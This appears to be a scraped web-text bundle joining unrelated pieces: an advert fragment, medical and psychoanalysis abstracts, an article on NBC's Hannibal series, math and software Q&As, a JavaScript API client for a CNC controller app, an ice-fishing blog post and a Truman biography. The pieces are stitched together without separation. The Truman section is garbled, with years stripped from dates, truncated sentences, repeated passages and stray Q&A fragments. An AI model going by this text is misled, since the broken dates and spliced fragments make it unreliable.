call and we would return, collect our equipment and refund your money in full. No Quibble, No Fuss, No Risk. Reasonable conditions apply, please see our website for full details. Call us now on 0800 652 9343 and book your free estimate. We would send our engineer whom would discuss your requirements give a written quotation and be able to proceed there and then if you wish. Book on-line
Gamma delta intraepithelial lymphocytes drive tumor necrosis factor-alpha responsiveness to intestinal iron challenge: relevance to hemochromatosis. The dependence of intestinal epithelial cell (IEC) growth and differentiation on intraepithelial lymphocytes (IELs) expressing the gamma/delta (gamma delta) T-cell receptor (TCR), suggested a potential role for gamma delta + IELs in the regulation of iron absorption. We therefore examined the levels of hepatic iron and the IEL cytokine responses in C57BL/6J control and class I and TCR knockout lines (placed on a C57BL/6J genetic background) following the administration of supplemental dietary iron. The highest level of liver iron was found in the beta 2-microglobulin knockout (beta 2m-/-) mice followed by the TCR-delta knockout (TCR delta-/-) animals. TCR-alpha knockout (TCR alpha-/-) and control animals did not differ in their iron levels. Liver iron loading correlated inversely with the ability of the mice to generate an IEL tumor necrosis factor (TNF)-alpha response. These observations suggest a model in which IEC iron loading is communicated to IELs via the HFE class I protein. The result of this communication is the initiation of TNF-alpha release by gamma delta + IELs (sustained by macrophages and dendritic cells) contributing to the upregulation of ferritin expression and possibly to the normal maintenance of the IEC apoptotic pathway.
Hannibal type TV Show network NBC genre Crime NBC’s new take on serial killer Hannibal Lecter is shaping up to be quite an interesting (and series-TV-friendly) departure from films like Silence of the Lambs. Bryan Fuller (Pushing Daises, Heroes) is taking five pages of backstory about the infamous cannibal psychiatrist from Thomas Harris’ book Red Dragon and using it as the basis for the first couple seasons of his planned drama. Hannibal, which has received a 13-episode series order, features Lecter solving crimes with empathic FBI profiler Will Graham (Hugh Dancy). For the first time, viewers will spend quality time with Lecter while he’s at large and before the world knows his secrets, working side by side with a similarly brilliant man who is destined to catch him. “It’s before he was incarcerated, so he’s more of a peacock,” Fuller tells EW.com. “There is a cheery disposition to our Hannibal. He’s not being telegraphed as a villain. If the audience didn’t know who he was, they wouldn’t see him coming. What we have is Alfred Hitchcock’s principle of suspense — show the audience the bomb under the table and let them sweat when it’s going to go boom. So the audience knows who Hannibal is so we don’t have to overplay his villainy. We get to subvert his legacy and give the audience twists and turns.” So Hannibal almost plays like a crime procedural featuring two very smart investigators — but one of them is a serial killer. It’s also a highly unusual plan in broadcast series TV to start out a drama with one format, while planning from the very beginning to dramatically shake up the story once Hannibal is outed. “It really is a love story, for lack of a better description, between these two characters,” Fuller says. “As Hannibal has said [to Graham] in a couple of the movies, ‘You’re a lot more like me than you realize.’ We’ll get to the bottom of exactly what that means over the course of the first two seasons. But we’re taking our sweet precious time.” Hannibal will also be unusual because it’s planned as a 13-episode-per-season show. So though the drama won’t rush Hannibal’s story, it also won’t feel like its padded with throwaway episodes either. “Doing a cable model on network television gives us the opportunity not to dally in our storytelling because we have a lot of real estate to cover,” Fuller says. “I pitched a seven-season arc including stories from various [Thomas Harris] books.” The show will include familiar characters from Harris’ novels, though he’s “Starbucking” the genders of a couple of them. FBI boss Jack Crawford will remain male, but Dr. Alan Bloom is becoming Dr. Alana Bloom, and tabloid journalist Freddy Lounds is becoming tabloid blogger Fredricka Lounds. Between Hannibal and Fuller’s Munsters reboot pilot Mockingbird Lane, the writer certainly has his hands full. Still, there’s one other TV series idea that we’re all hoping eventually gets off the ground — the return of Star Trek. Fuller has previously spoken to director-producer Bryan Singer about teaming to reboot the TV franchise, though any movement depends on rights-holder Paramount and Trek’s current creative kingpin, J.J. Abrams (who, of course, knows a thing or two about making TV shows too). The consensus has been that there is unlikely to be a Trek TV show while the current movie franchise is still regularly hitting theaters. “Bryan and I are big fans of Trek and have discussed a take on what we would do, and we would love to do it,” Fuller says. “I don’t think anything is going to happen in any official capacity until after the next movie comes out. And I’m sure it would be wisely under J.J. Abrams’ purview of what happens. He’s the guardian of Trek right now.”
Q: Issues with a particular bilinear form and determining rank, signature, etc. of its restriction Let $b: M_2(\mathbb{R}) \times M_2(\mathbb{R}) \to \mathbb{R}$ such that $b(X,Y)=trace(X^tAY)$, where $X^t$ is the transpose of $X$ and $A=\begin{pmatrix} 2 & 1\\1 & 0\end{pmatrix}$. In my original exercise I had to determine the matrix associated to $b$ with respect to various bases, and I could do that without trouble. However, while doing this, I asked myself some additional questions (which unfortunately I wasn't able to answer). Here they are: How can I prove that this is indeed a bilinear symmetric form when $A$ is a generic matrx? Considering $A=\begin{pmatrix} 2 & 1\\1 & 0\end{pmatrix}$, how can I determine the rank, kernel, image and signature of the restriction of b to the subspace of symmetric matrices of order $2$? My issues are with the whole process of the proof in point (1) and with working with the restriction in point (2). Could you please show me with details how to proceed with these problems? A: For the first problem: note that $$ b(X_1 + a X_2,Y) = \\ \operatorname{trace}[(X_1 + aX_2)^TAY] = \\ \operatorname{trace}[X_1^TAY + aX_2^TAY] =\\ \operatorname{trace}[X_1^TAY] + a\operatorname{trace}[X_2^TAY] =\\ b(X_1,Y) + ab(X_2,Y) $$ this shows that $b$ is linear in the first argument. We may do something similar for the other argument. For the second: it suffices to find $b$ with respect to a basis for this space. We can take $$ v_1 = \pmatrix{1&0\\0&0}, \quad v_2 = \pmatrix{0&1\\1&0}, \quad v_3 = \pmatrix{0&0\\0&1} $$ For ease of computation, note that $$ \operatorname{trace} \pmatrix{u^T\\v^T} A \pmatrix{x&y} = u^TAx + v^TAy $$ Going through it all, you should find that the matrix of the bilinear form (over the restriction) is $$ \pmatrix{2&1&0\\1&2&1\\0&1&0} $$
Current practice in endodontics. The aim of this series of six articles is to improve the quality of endodontic treatment in general dental practice by considering what is currently being taught in dental schools. This first article considers the rationale behind endodontic treatment, what we are aiming to achieve and why. It looks at the dental and medico-legal issues which dictate the standards of our practice, and sets out the programme for the series.
Parallel process and projective identification in psychoanalytic supervision. In the present paper I explore the notion of the parallel process, a controversial concept in psychoanalytic supervision. I suggest that the parallel process is essentially the operation of the defensive process of projective identification, which in some quarters is similarly viewed with skepticism and/or is mistakenly seen as primarily a malignant defense operating exclusively in severe character pathology (Kernberg, 1975; Mendelsohn, 2009). Further, I present several vignettes of psychoanalytic supervision where a series of parallel processes occurred, and I suggest that these parallel enactments are the result of the projective identifications which stimulated them. I agree with critical writers who say that simply suggesting the presence of a parallel process in the supervision adds no new information to the supervision, but I show how an exploration of the parallel enactments, which includes (1) exploring the patient-therapist dyadic dynamics, (2) a narrowly focused exploration of the dynamics of the therapist/presenter, and (3) and an exploration of the dynamics of the therapist-supervisor dyad, can enrich the treatment, as well as the supervision. Finally I suggest that while the projective identification that occurs in the supervisory dyad does not always lead to a parallel process, every parallel process is the result of projective identification(s). I further suggest that while every parallel process does not lead to an enactment via projective identification, enactments can only occur via the parallel process instigated by projective identification.
Q: Is querying the model from the viewmodel anti-pattern? I use Linq-to-SQL to create my models. I have a Movies table that lists all of the users' favorite movies. In my VM, I'll have access to a current user. I want to call to my linq entity to get all the users favorite movies. Is it bad practice to have the actual linq query to the Movies table directly in a method in my VM? Public Class MyVM Public Sub GetMovies() 'some linq query to get the movies based on the user's id End Sub ...more stuff... End Class Or, should I have that method in my model and only call a GetAll(ByVal id as Integer) function from the model or a repository? I'm pretty new to patterns. I know patterns are more of a guide, but I'd like to follow it correctly before I make those determinations when the situation arises. A: A view model is there to represent your data, for example on a view (in ASP.NET MVC). For example lets say you have a view that has to display user data. You will return a User object by ID from a service or repository call (to a database). You will then map this User object to the view model. Then you would return this view model to the view and the view will use it to display the user's data to the client. If I could then I could show you some C# code. I don't have time to go look up the VB.NET equivalent.
import ensureArray from 'ensure-array'; import superagent from 'superagent'; import superagentUse from 'superagent-use'; import store from '../store'; const bearer = (request) => { const token = store.get('session.token'); if (token) { request.set('Authorization', 'Bearer ' + token); } }; // Modify request headers and query parameters to prevent caching const noCache = (request) => { const now = Date.now(); request.set('Cache-Control', 'no-cache'); request.set('X-Requested-With', 'XMLHttpRequest'); if (request.method === 'GET' || request.method === 'HEAD') { // Force requested pages not to be cached by the browser by appending "_={timestamp}" to the GET parameters, this will work correctly with HEAD and GET requests. The parameter is not needed for other types of requests, except in IE8 when a POST is made to a URL that has already been requested by a GET. request._query = ensureArray(request._query); request._query.push(`_=${now}`); } }; const authrequest = superagentUse(superagent); authrequest.use(bearer); authrequest.use(noCache); // // Authentication // const signin = (options) => new Promise((resolve, reject) => { const { token, name, password } = { ...options }; authrequest .post('/api/signin') .send({ token, name, password }) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); // // Latest Version // const getLatestVersion = () => new Promise((resolve, reject) => { authrequest .get('/api/version/latest') .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); // // State // const getState = (options) => new Promise((resolve, reject) => { const { key } = { ...options }; authrequest .get('/api/state') .query({ key: key }) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); const setState = (options) => new Promise((resolve, reject) => { const data = { ...options }; authrequest .post('/api/state') .send(data) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); const unsetState = (options) => new Promise((resolve, reject) => { const { key } = { ...options }; authrequest .delete('/api/state') .query({ key: key }) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); // // G-code // const loadGCode = (options) => new Promise((resolve, reject) => { const { port = '', name = '', gcode = '', context = {} } = { ...options }; authrequest .post('/api/gcode') .send({ port, name, gcode, context }) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); const fetchGCode = (options) => new Promise((resolve, reject) => { const { port = '' } = { ...options }; authrequest .get('/api/gcode') .query({ port: port }) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); const downloadGCode = (options) => { const { port = '' } = { ...options }; const $form = document.createElement('form'); $form.setAttribute('id', 'export'); $form.setAttribute('method', 'POST'); $form.setAttribute('enctype', 'multipart/form-data'); $form.setAttribute('action', 'api/gcode/download'); const $port = document.createElement('input'); $port.setAttribute('name', 'port'); $port.setAttribute('value', port); const $token = document.createElement('input'); $token.setAttribute('name', 'token'); $token.setAttribute('value', store.get('session.token')); $form.appendChild($port); $form.appendChild($token); document.body.append($form); $form.submit(); document.body.removeChild($form); }; // // Controllers // const controllers = {}; controllers.get = () => new Promise((resolve, reject) => { authrequest .get('/api/controllers') .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); // // Watch Directory // const watch = {}; watch.getFiles = (options) => new Promise((resolve, reject) => { const { path } = { ...options }; authrequest .post('/api/watch/files') .send({ path }) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); watch.readFile = (options) => new Promise((resolve, reject) => { const { file } = { ...options }; authrequest .post('/api/watch/file') .send({ file }) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); // // Users // const users = {}; users.fetch = (options) => new Promise((resolve, reject) => { authrequest .get('/api/users') .query(options) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); users.create = (options) => new Promise((resolve, reject) => { authrequest .post('/api/users') .send(options) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); users.read = (id) => new Promise((resolve, reject) => { authrequest .get('/api/users/' + id) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); users.delete = (id) => new Promise((resolve, reject) => { authrequest .delete('/api/users/' + id) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); users.update = (id, options) => new Promise((resolve, reject) => { authrequest .put('/api/users/' + id) .send(options) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); // // Events // const events = {}; events.fetch = (options) => new Promise((resolve, reject) => { authrequest .get('/api/events') .query(options) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); events.create = (options) => new Promise((resolve, reject) => { authrequest .post('/api/events') .send(options) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); events.read = (id) => new Promise((resolve, reject) => { authrequest .get('/api/events/' + id) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); events.delete = (id) => new Promise((resolve, reject) => { authrequest .delete('/api/events/' + id) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); events.update = (id, options) => new Promise((resolve, reject) => { authrequest .put('/api/events/' + id) .send(options) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); // // Macros // const macros = {}; macros.fetch = (options) => new Promise((resolve, reject) => { authrequest .get('/api/macros') .query(options) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); macros.create = (options) => new Promise((resolve, reject) => { authrequest .post('/api/macros') .send(options) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); macros.read = (id) => new Promise((resolve, reject) => { authrequest .get('/api/macros/' + id) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); macros.update = (id, options) => new Promise((resolve, reject) => { authrequest .put('/api/macros/' + id) .send(options) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); macros.delete = (id) => new Promise((resolve, reject) => { authrequest .delete('/api/macros/' + id) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); // // MDI // const mdi = {}; mdi.fetch = (options) => new Promise((resolve, reject) => { authrequest .get('/api/mdi') .query(options) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); mdi.create = (options) => new Promise((resolve, reject) => { authrequest .post('/api/mdi') .send(options) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); mdi.read = (id) => new Promise((resolve, reject) => { authrequest .get('/api/mdi/' + id) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); mdi.update = (id, options) => new Promise((resolve, reject) => { authrequest .put('/api/mdi/' + id) .send(options) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); mdi.bulkUpdate = (options) => new Promise((resolve, reject) => { authrequest .put('/api/mdi/') .send(options) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); mdi.delete = (id) => new Promise((resolve, reject) => { authrequest .delete('/api/mdi/' + id) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); // // Commands // const commands = {}; commands.fetch = (options) => new Promise((resolve, reject) => { authrequest .get('/api/commands') .query(options) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); commands.create = (options) => new Promise((resolve, reject) => { authrequest .post('/api/commands') .send(options) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); commands.read = (id) => new Promise((resolve, reject) => { authrequest .get('/api/commands/' + id) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); commands.update = (id, options) => new Promise((resolve, reject) => { authrequest .put('/api/commands/' + id) .send(options) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); commands.delete = (id) => new Promise((resolve, reject) => { authrequest .delete('/api/commands/' + id) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); commands.run = (id) => new Promise((resolve, reject) => { authrequest .post('/api/commands/run/' + id) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); // // Machines // const machines = {}; machines.fetch = (options) => new Promise((resolve, reject) => { authrequest .get('/api/machines') .query(options) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); machines.create = (options) => new Promise((resolve, reject) => { authrequest .post('/api/machines') .send(options) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); machines.read = (id) => new Promise((resolve, reject) => { authrequest .get('/api/machines/' + id) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); machines.update = (id, options) => new Promise((resolve, reject) => { authrequest .put('/api/machines/' + id) .send(options) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); machines.delete = (id) => new Promise((resolve, reject) => { authrequest .delete('/api/machines/' + id) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); machines.run = (id) => new Promise((resolve, reject) => { authrequest .post('/api/machines/run/' + id) .end((err, res) => { if (err) { reject(res); } else { resolve(res); } }); }); export default { getLatestVersion, // State getState, setState, unsetState, // G-code loadGCode, fetchGCode, downloadGCode, // Authentication signin, // Controllers controllers, // Watch Directory watch, // Settings commands, events, machines, macros, mdi, users, };
Pages background Monday, March 10, 2014 Ice-Fishing w/ Jay, 3-8-2014 Date: 3-8-2014 Time Fished: 10:00am-5:30pm Water Clarity: From 5" to 6.5', depending on where you were Water temp: 14" of ice Species Sought: Any Fish caught: Crappies, Bluegills, Largemouth Bass Planned to maybe hit a few ponds/lakes, but it was fun enough to keep our attention all day. I drilled a hole and marked a couple fish. They would come and go....more often they would be GONE than actually present. Jay showed up after I did. He drilled holes in usual spots, didn't mark ANY fish. Finally had ONE show up, and caught it...a crappie that was deep. He eventually came over by me, and I drilled some new holes as well. The fish would come in waves, it seemed. Most often is was a couple fish that would come in. Occasionally the flasher would be lit up from 3' down to 14'! The bluegills seemed to be hanging just a bit deeper, while the crappies seemed to prefer 2'-6'. In some holes, I could see my jig down to 6'. I would sight-fish then. THAT was FUN! I had a few crappies that came in just a foot below the ice! Wish I had video of that! After awhile, we had to hole hop to keep finding fish, because they would disappear out of some holes, but might come back later. It wasn't a stellar day by any means, but it was the funnest, most consistent action I've had this ice season. I didn't do a good job of tracking how many I caught, so I'm underestimating to say I caught at least 23 crappies, 18 bluegills, and 1 largemouth bass. Lost a decent bass just under the hole. I started out with a vertical jig / waxie. Caught a lot of fish on that. Later in the day, I tipped with Gulp! instead...the crappies and bass liked that every bit as much, but the bluegills hit it less frequently. Thanks for sharing another of your winter ice fishing outings. I have really enjoyed them and it has helped me get through a long winter in Northern Colorado. However, I agree with Atlas. Spring is coming!
Therefore, on April 11, , Truman fired MacArthur from his commands. The dismissal of General Douglas MacArthur was among the least politically popular decisions in presidential history. Truman and his generals considered the use of nuclear weapons against the Chinese army, but ultimately chose not to escalate the war to a nuclear level. It called for tripling the defense budget, and the globalization and militarization of containment policy whereby the United States and its NATO allies would respond militarily to actual Soviet expansion. The document was drafted by Paul Nitze , who consulted State and Defense officials, and was formally approved by President Truman as official national strategy after the war began in Korea. It called for partial mobilization of the U. The plan called for strengthening Europe, weakening the Soviet Union, and building up the United States both militarily and economically. The treaty establishing it was widely popular and easily passed the Senate in ; Truman appointed General Eisenhower as commander. The alliance resulted in the Soviets establishing a similar alliance, called the Warsaw Pact. On June 27, , after the outbreak of fighting in Korea, Truman ordered the U. Truman usually worked well with his top staff—the exceptions were Israel in and Spain — Truman was a very strong opponent of Francisco Franco , the right-wing dictator of Spain. He withdrew the American ambassador but diplomatic relations were not formally broken , kept Spain out of the UN, and rejected any Marshall Plan financial aid to Spain. However, as the Cold War escalated, support for Spain was strong in Congress, the Pentagon, the business community and other influential elements especially Catholics and cotton growers. Liberal opposition to Spain had faded after the Wallace element broke with the Democratic Party in ; the CIO became passive on the issue. As Secretary of State Acheson increased his pressure on Truman, the president, stood alone in his administration as his own top appointees wanted to normalize relations. When China entered the Korean War and pushed American forces back, the argument for allies became irresistible. Admitting he was "overruled and worn down," Truman relented and sent an ambassador and made loans available. He said an underground communist network had worked inside the U. Chambers did not allege any spying during the Truman presidency. Although Hiss denied the allegations, he was convicted in January for perjury for denials under oath. In , Truman described American communist leaders, whom his administration was prosecuting , as "traitors", but in he vetoed the McCarran Internal Security Act. It was passed over his veto. In , Truman ordered an addition to the exterior of the White House: The addition was unpopular. Some said it spoiled the appearance of the south facade, but it gave the First Family more living space. As the newer West Wing , including the Oval Office , remained open, Truman walked to and from his work across the street each morning and afternoon. On the street outside the residence, Torresola mortally wounded a White House policeman, Leslie Coffelt. Before he died, the officer shot and killed Torresola. Collazo was wounded and stopped before he entered the house. He was found guilty of murder and sentenced to death in Truman commuted his sentence to life in prison. To try to settle the question of Puerto Rican independence, Truman allowed a plebiscite in Puerto Rico in to determine the status of its relationship to the United States. Truman cited his authority as Commander in Chief and the need to maintain an uninterrupted supply of steel for munitions for the war in Korea. In , the Senate, led by Estes Kefauver , investigated numerous charges of corruption among senior administration officials, some of whom received fur coats and deep freezers in exchange for favors. When Attorney General J. Howard McGrath fired the special prosecutor in early for being too zealous, Truman fired McGrath. Miss Truman is a unique American phenomenon with a pleasant voice of little size and fair quality Some day I hope to meet you. Pegler , a gutter snipe, is a gentleman alongside you. Truman was criticized by many for the letter. However, he pointed out that he wrote it as a loving father and not as the president. A report by the Truman administration titled To Secure These Rights presented a detailed ten-point agenda of civil rights reforms. Speaking about this report, international developments have to be taken into account, for with the UN-Charter being passed in , the question whether international human rights law could be applicable also on an inner-land basis became crucial in the United States. Though the report acknowledged such a path was not free from controversy in the s United States, it nevertheless raised the possibility for the UN-Charter to be used as a legal tool to combat racial discrimination in the United States. In February , the president submitted a civil rights agenda to Congress that proposed creating several federal offices devoted to issues such as voting rights and fair employment practices. Tales of the abuse, violence, and persecution suffered by many African-American veterans upon their return from World War II infuriated Truman, and were a major factor in his decision to issue Executive Order , in July , requiring equal opportunity in the armed forces. Another executive order, also in , made it illegal to discriminate against persons applying for civil service positions based on race. This committee ensured defense contractors did not discriminate because of race. Truman made five international trips during his presidency: In , the United States ratified the 22nd Amendment , making a president ineligible for election to a third term or for election to a second full term after serving more than two remaining years of a term of a previously elected president. Nevertheless, he seriously considered running for another term in , and left his name on the ballot in the New Hampshire primary. However all his close advisors, pointing to his age, his failing abilities, and his poor showing in the polls, talked him out of it. His first choice, Chief Justice Fred M. Vinson , had declined to run; Illinois Governor Adlai Stevenson had also turned Truman down, Vice President Barkley was considered too old, [] [] and Truman distrusted and disliked Senator Kefauver, who had made a name for himself by his investigations of the Truman administration scandals. Truman had hoped to recruit General Eisenhower as a Democratic candidate, but found him more interested in seeking the Republican nomination. Accordingly, Truman let his name be entered in the New Hampshire primary by supporters. Truman was eventually able to persuade Stevenson to run, and the governor gained the nomination at the Democratic National Convention. He pledged to clean up the "mess in Washington," and promised to "go to Korea. While Truman and Eisenhower had previously been on good terms, Truman felt annoyed Eisenhower did not denounce Joseph McCarthy during the campaign. Anti-Semitism, anti-Catholicism, and anti-foreignism" within the Republican Party. Upon leaving the presidency, Truman returned to Independence, Missouri, to live at the Wallace home he and Bess had shared for years with her mother. He also turned down numerous offers for commercial endorsements. Since his earlier business ventures had proved unsuccessful, he had no personal savings. As a result, he faced financial challenges. Once Truman left the White House, his only income was his old army pension: In , however, there was no such benefit package for former presidents, and he received no pension for his Senate service. Truman took out a personal loan from a Missouri bank shortly after leaving office, and then found a lucrative book deal for his memoirs. Memoirs by Harry S. Year of Decisions and Memoirs by Harry S. Years of Trial and Hope The former president told House Majority Leader John McCormack in , "Had it not been for the fact that I was able to sell some property that my brother, sister, and I inherited from our mother, I would practically be on relief, but with the sale of that property I am not financially embarrassed. Roosevelt, had organized his own presidential library , but legislation to enable future presidents to do something similar had not been enacted. Truman worked to garner private donations to build a presidential library, which he donated to the federal government to maintain and operate—a practice adopted by his successors. Max Skidmore, in his book on the life of former presidents, noted that Truman was a well-read man, especially in history. Skidmore added that the presidential papers legislation and the founding of his library "was the culmination of his interest in history. Together they constitute an enormous contribution to the United States—one of the greatest of any former president. In late , when Lyndon B. It has become an operational and at times a policy-making arm of the government. This has led to trouble and may have compounded our difficulties in several explosive areas. Averell Harriman of New York. After a fall in his home in late , his physical condition declined. In , President Lyndon B. Johnson signed the Medicare bill at the Harry S. He developed multiple organ failure, fell into a coma, and died at 7: Bess Truman opted for a simple private service at the library rather than a state funeral in Washington. A week after the funeral, foreign dignitaries and Washington officials attended a memorial service at Washington National Cathedral. Bess died in and is buried next to Harry at the Harry S. Truman Library and Museum in Independence, Missouri. Vigorous, hard-working, simple, he had grown up close to the soil of the Midwest and understood the struggles of the people on the farms and in the small towns. After 10 years in the Senate, he had risen above the Pendergast organization. Still, he had come from a world of two-bit politicians, and its aura was one that he never was able to shed entirely. And he did retain certain characteristics one often sees in machine-bred politicians: Citing continuing divisions within the Democratic Party, the ongoing Cold War, and the boom and bust cycle, journalist Samuel Lubell in stated: Nowhere in the whole Truman record can one point to a single, decisive break-through All his skills and energies—and he was among our hardest-working Presidents—were directed to standing still. The period following his death consolidated a partial rehabilitation of his legacy among both historians and members of the public. Truman has had his latter-day critics as well. After a review of information available to Truman about the presence of espionage activities in the U. The Dissolution of the Soviet Union in caused Truman advocates to claim vindication for his decisions in the postwar period. According to Truman biographer Robert Dallek , "His contribution to victory in the cold war without a devastating nuclear conflict elevated him to the stature of a great or near-great president. McCoy in his book on the Truman presidency:. Harry Truman himself gave a strong and far-from-incorrect impression of being a tough, concerned and direct leader. He was occasionally vulgar, often partisan, and usually nationalistic On his own terms, Truman can be seen as having prevented the coming of a third world war and having preserved from Communist oppression much of what he called the free world. Yet clearly he largely failed to achieve his Wilsonian aim of securing perpetual peace, making the world safe for democracy, and advancing opportunities for individual development internationally. In , Truman traveled to Europe with his wife. In , he helped establish the Grandview Lodge, and he served as its first Worshipful Master. In September , during his Senate re-election campaign, Truman was elected Grand Master of the Missouri Grand Lodge of Freemasonry; Truman said later that the Masonic election assured his victory in the general election. Southern Jurisdiction Headquarters in Washington D. In , the Truman Scholarship was created as a federal program to honor U. Truman Fellowship in National Security Science and Engineering was created as a distinguished postdoctoral three-year appointment at Sandia National Laboratories. Truman School of Public Affairs to advance the study and practice of governance. A member institution of the City Colleges of Chicago , Harry S Truman College in Chicago, Illinois , is named in his honor for his dedication to public colleges and universities. In , the headquarters for the State Department , built in the s but never officially named, was dedicated as the Harry S Truman Building. Truman, was erected in with donations from Greek-Americans. From Wikipedia, the free encyclopedia. For other uses, see Harry Truman disambiguation. Corporal National Guard Captain active Colonel reserve. Democratic Party vice presidential candidate selection, Truman visits his mother in Grandview, Missouri , after being nominated the Democratic candidate for vice president , July Roosevelt —Truman poster from Presidency of Harry S. Atomic bombings of Hiroshima and Nagasaki. Strike wave of United States presidential election, Truman, October 13, , St. Paul, Minnesota, Radio Broadcast [] [] [] [] []. If it was, half to three-quarters of them would be in jail. Truman Presidential Library and Museum. As this was prior to the adoption of the Twenty-Fifth Amendment in , a vacancy in the office of Vice President was not filled until the next ensuing election and inauguration. There is controversy over whether the period after the S should be included, or omitted, or if both forms are equally valid. New York Summit Books. A Profile of Kansas City Jewry. University of Missouri Press. The Rise to Power. From Law Office to Oval Office. The Letters from Harry to Bess Truman, — President Truman and the Cold War, — Adversaries for a Common Cause. Immigration and the Legacy of Harry S. Truman State University Press. Religion and the American Presidency. God In The Obama Era. Retrieved May 21, Was President Truman the first Baptist president? George Washington to George W. US Army Order of Battle, — Combat Studies Institute Press. Association of the United States Army, St. The Myths of Revisionism. Truman, 33rd President of the United States". Truman Library and Museum. Retrieved May 27, Truman Military Personnel File". Retrieved December 17, — via Harry S. He was the Vice President elected with Franklin D. Roosevelt in , and succeeded to the Presidency when FDR died. Truman was re-elected in , serving as President from April 12, to January 20, What was the name of the 33rd president of US? The 33rd president of the US is Harry S. The 33rd president of the U. What is the 33rd state? The 33rd state admitted to the Union was Oregon. Was California the 33rd state? No, California was the 31st state. Minnesota was 32nd, and Oregonwas 33rd. Who was the 33rd US president? Truman fromApril 12, to January 20, Harry S. Truman was the 33rd US President. Truman later ran for the office in Hewas an underdog to win the presidency in that election year to theRepublican Governor of the State of New York. Truman was famous forthe quote of "The buck stops here". Roosevelt the 33rd president? It can be used for panfish, or even for sport fish like bass. Many use them to catch ocean panfish like croakers … and pompano, easily one of the best all purpose reels ever. Can you use 33 cent stamps? Yes you can use 33 cent stamps. As long as the total postage on the envelope equals the cost of postage it is okay. US stamps have not been devalued since the Civil War.. Can you still use cent stamps? In Coins and Paper Money. In Bodies of Water. There are thousands of lakes and ponds in the United States, and thousands more rivers, streams, brooks, etc. As this question was asked and answered in July , the answer isRonald Reagan. Democratic Republican Third parties Libertarian Green. For example, George Washington served two consecutive terms and is counted as the first president not the first and second. Grover Cleveland was both the 22nd president and the 24th president because his two terms were not consecutive. A vice president who temporarily becomes acting president under the Twenty-fifth Amendment to the Constitution is not counted, because the president remains in office during such a period. As a result, his first term was only 1, days long as opposed to the usual 1, , and was the shortest term for a U. The elections of were the first ones in the United States that were contested on anything resembling a partisan basis. As a result, his first term was only 1, days long, and was the shortest term for a U. Federalist John Adams was elected president, and Jefferson of the Democratic-Republicans was elected vice president. Later, while president, Johnson tried and failed to build a party of loyalists under the National Union banner. Near the end of his presidency, Johnson rejoined the Democratic Party. Arthur was initially sworn in as president on September 20, , and then again on September Retrieved October 1, Retrieved July 1, Retrieved January 22, Retrieved January 18, Retrieved March 6, Retrieved November 21, Retrieved November 27, Retrieved March 7, Retrieved January 20, Presidents of the United States. Chief executives of the United States. President of the United States. Retrieved from " https: Wikipedia pages semi-protected against vandalism Use mdy dates from April Articles with short description. Views Read View source View history. In other projects Wikiquote. This page was last edited on 29 January , at By using this site, you agree to the Terms of Use and Privacy Policy. This article is part of a series on the. Elections Presidential elections Midterm elections Off-year elections. United States portal Other countries Atlas. April 30, [d] — March 4, George Washington — Lived: Commander-in-Chief of the Continental Army — John Adams [e] [f]. March 4, — March 4, John Adams — Lived: Thomas Jefferson — Lived: Aaron Burr March 4, — March 4, George Clinton March 4, — March 4, James Madison — Lived: George Clinton March 4, — April 20, Died in office. Martin Van Buren March 4, — March 4, Martin Van Buren — Lived: March 4, — April 4, Died in office. William Henry Harrison — Lived: United States Minister to Colombia — John Tyler Succeeded to presidency. April 4, [i] — March 4, John Tyler — Lived: Whig April 4, — September 13, Unaffiliated September 13, — March 4, [j]. March 4, — July 9, Died in office. Commanding General of the U. Army — No prior elected office. Schuyler Colfax March 4, — March 4, Henry Wilson March 4, — November 22, Died in office. March 4, — September 19, Died in office. Arthur Succeeded to presidency. Truman cited his authority as Commander in Chief and the need to maintain an uninterrupted supply of steel for munitions for the war in Korea. In , the Senate, led by Estes Kefauver , investigated numerous charges of corruption among senior administration officials, some of whom received fur coats and deep freezers in exchange for favors. When Attorney General J. Howard McGrath fired the special prosecutor in early for being too zealous, Truman fired McGrath. Miss Truman is a unique American phenomenon with a pleasant voice of little size and fair quality Some day I hope to meet you. Pegler , a gutter snipe, is a gentleman alongside you. 